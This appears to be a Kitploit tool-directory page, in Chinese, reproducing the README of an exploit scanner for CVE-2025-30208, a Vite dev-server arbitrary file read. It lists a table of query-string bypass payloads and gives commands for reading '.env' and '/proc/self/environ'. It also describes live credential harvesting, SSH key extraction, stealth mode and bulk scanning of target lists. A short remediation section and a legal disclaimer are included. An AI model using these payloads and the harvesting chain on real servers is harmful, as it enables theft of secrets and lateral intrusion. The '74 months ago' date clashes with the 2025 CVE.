Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-30208 — 针对CVE-2025-30208(Vite任意文件读取)的漏洞扫描器,具备多变种绕过检测、凭据收集、SSH密钥提取功能,并为授权的渗透测试提供结构化报告。 | Kitploit
工具/GitHubGitHub/hazavvip/cve-2025-30208
漏洞分析漏洞利用Web应用程序漏洞利用数据泄露信息收集渗透测试
GitHubhazavvip/cve-2025-30208

CVE-2025-30208

针对CVE-2025-30208(Vite任意文件读取)的漏洞扫描器,具备多变种绕过检测、凭据收集、SSH密钥提取功能,并为授权的渗透测试提供结构化报告。

查看仓库
74个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-30208 — Vite 任意文件读取 · v5

CVE: CVE-2025-30208
GHSA: GHSA-x574-m823-4x7w
严重性: CVSS 5.3 中等(网络可访问的开发服务器)

⚠ 仅限授权安全测试。
未经授权对不属于您或未获得明确书面许可的系统进行测试是违法的。


描述

Vite 的开发服务器允许通过 /@fs/ 请求提供主机文件系统中的任意文件。
受影响版本中缺少对查询字符串的清理检查,使攻击者可以附加特制的后缀以绕过白名单,读取进程可访问的任何文件——包括 .env 文件、SSH 私钥、云凭据和 /proc 条目。


受影响版本

分支最后一个受影响版本已修复版本
6.3.x6.3.06.3.1+
6.2.x6.2.26.2.3+
6.1.x6.1.16.1.2+
6.0.x6.0.116.0.12+
5.4.x5.4.145.4.15+
4.5.x4.5.94.5.10+

绕过变种


安装

root@kitploit:~
pip install requests
# 或
pip install -r requirements.txt

使用方法

单个目标 — 全面扫描

root@kitploit:~
python main.py -t https://target.com

完整利用链(实时凭据验证,默认行为)

root@kitploit:~
python main.py -t https://target.com --full-chain --output /tmp/report

读取特定文件

root@kitploit:~
python main.py -t https://target.com --file /app/.env
python main.py -t https://target.com --file /proc/self/environ --save ./environ.txt

隐身模式(随机延迟)+ 上游代理

root@kitploit:~
python main.py -t https://target.com --stealth --proxy http://127.0.0.1:8080

从目标列表批量扫描

root@kitploit:~
python main.py -l targets.txt
python main.py -l targets.txt --workers 20 --ports 5173,3000,8080

管道友好输出(无 ANSI 代码)

root@kitploit:~
python main.py -t https://target.com --no-color | tee scan.log

版本

root@kitploit:~
python main.py --version

作为包运行

root@kitploit:~
python -m cve30208 -t https://target.com

CLI 参考

默认批量扫描端口:5173, 4173, 3000, 8080, 8000, 4000, 5000, 9000, 80, 443


输出

当指定 --output /tmp/report 时,扫描器会写入:

  • /tmp/report.json — 机器可读的结构化发现结果
  • /tmp/report.md — 人类可读的 Markdown 报告

批量扫描总是在最后一行打印 VULN_COUNT=N 以便于 shell 脚本处理:

root@kitploit:~
python main.py -l targets.txt | grep '^VULN_COUNT='

单个目标扫描在末尾打印 SCAN_STATUS=VULNERABLE|NOT_VULNERABLE 以实现自动化。


架构(v5)

root@kitploit:~
cve30208/
├── __init__.py      — 公共 API 接口
├── __main__.py      — python -m cve30208 入口点
├── constants.py     — BYPASS、CVE_SIBLING、SECRET_PATTERNS、SSH/扫描常量
├── ui.py            — ANSI 颜色代码、Spin/NullSpin、终端辅助函数
├── utils.py         — 共享辅助函数 (_unescape_js_string)
├── secrets.py       — scan_secrets()、parse_env()、parse_environ()
├── ssh.py           — extract_ssh_key()、collect_ssh_targets()
├── exploit.py       — ExploitResult、ExploitStage(实时凭据验证)
│                      包含一个检查注册表以便于扩展
├── report.py        — save_report()、make_md()
└── scanner.py       — FR/R 数据类、Scanner、bulk_scan()、main()
main.py              — 向后兼容性填充器
requirements.txt

去重

扫描器自动抑制重复工件,使输出即使在 HOME 等于 /root 或同一机密出现在多个文件中时也能保持清晰:

摘要行报告有多少文件、机密和 SSH 密钥被抑制为重复项,例如:

root@kitploit:~
  deduped     2 个文件,4 个凭据,1 个 SSH 密钥被抑制为重复项

修复建议

  1. 升级 Vite 到您分支的已修复版本(参见上表)。
  2. 切勿在不受信任的网络上以 --host 0.0.0.0 启动 Vite 开发服务器。
  3. 轮换所有可能已暴露的机密(API 密钥、数据库密码、SSH 密钥)。
  4. 审计 .env 文件,并从项目中删除不必要的机密。

法律声明

此工具仅供授权的渗透测试和安全研究使用。
使用此工具即表示您同意已获得测试目标系统的明确书面授权。
作者对因使用本软件造成的任何滥用或损害不承担任何责任。


CVE-2025-30208 PoC v5

JSON 模式说明

生成的 JSON 现在包含:

  • schema_version(当前:1.0.0)
  • status(VULNERABLE 或 NOT_VULNERABLE)
  • safe_mode(当终端机密编辑模式启用时为 true)
  • report_redacted(当至少存在一个机密并且在持久化报告中被编辑时为 true)
  • 持久化报告文件中的机密值始终被编辑
下载工具
名称后缀/查询描述
raw???raw??末尾 ?? 破坏了 rawRE
import&raw???import&raw??ES 模块 + raw 组合
raw??raw?单个末尾 ?
url&raw???url&raw??URL 模式组合
raw&url???raw&url??参数顺序颠倒
import&?raw?import&?raw格式错误的导入前缀
sec-fetch?raw + Sec-Fetch 标头浏览器脚本上下文
raw-encoded?raw%3f%3fURL 编码的分隔符
double-slash?raw??/双斜杠后缀绕过 (v5)
pct-all%3fraw%3f%3f完全百分比编码的查询 (v5)
raw-hash?raw??#片段锚点绕过 (v5)
wasm-init?inline=1.wasm?initCVE-2025-31125 相关 (wasm init)
标志默认值描述
-t/--target—单个目标 URL
-l/--lists—每行一个目标的文件
--stealth关闭在请求间添加随机延迟
--proxy—HTTP/HTTPS 代理 (http://host:port)
--timeout10每次请求的超时时间(秒)
--verify关闭启用 TLS 证书验证
--file—读取目标主机上的特定路径
--save—将 --file 内容保存到本地路径
--full-chain开启运行完整利用链(默认进行实时验证)
--output—将 JSON + Markdown 报告写入此基础路径
--workers10批量扫描的并行工作线程数
--ports见下文批量模式下探测的端口(逗号分隔)
--no-color/--plain关闭禁用 ANSI 颜色代码
--safe-mode关闭在终端输出中编辑机密值
--show-secrets关闭在终端显示完整机密(覆盖 --safe-mode)
--version—打印版本并退出
层机制
文件系统读取stage_fs 使用 dict.fromkeys 规范化 SSH 密钥基列表,并在任何输出产生之前从 reads 队列中删除重复路径。
文件保存Scanner._save 检查每个扫描的 _seen_file_paths 集合;重复路径返回已存储的 FR 而不重新附加到 r.files。
机密Scanner._save 在所有文件中全局去重 r.secrets(按 (name, value));文件内去重由 scan_secrets 单独处理。
SSH 密钥stage_ssh 折叠具有相同 PEM 签名(前 _PEM_SIG_LEN 字节)且出现在多个源文件中的密钥。
跳转命令跳转块按 (key_source, host, port) 键控;仅打印一次相同的组合。